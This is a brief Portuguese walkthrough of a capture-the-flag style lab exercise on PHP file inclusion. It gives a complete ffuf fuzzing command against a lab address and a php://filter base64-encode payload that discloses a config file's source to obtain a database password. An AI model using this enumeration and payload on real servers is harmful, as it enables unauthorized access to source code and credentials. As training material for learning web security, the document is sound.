PHP Filters - 1

1. Fuzz o aplicativo da web para outros scripts php e, em seguida, leia um dos arquivos de configuração e envie a senha do banco de dados como resposta

• Primeiro devemos fazer um fuzz no site para encontrar arquivos com extensões .php

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://94.237.59.199:35189/FUZZ.php -fs 2652

• Uma vez que tenhamos uma lista de potenciais arquivos PHP que queremos ler, podemos começar a revelar suas fontes com o base64filtro PHP.

Pyload :

php://filter/read=convert.base64-encode/resource=configure

• Em seguida vamos decodificar a string base64 para descobrir a flag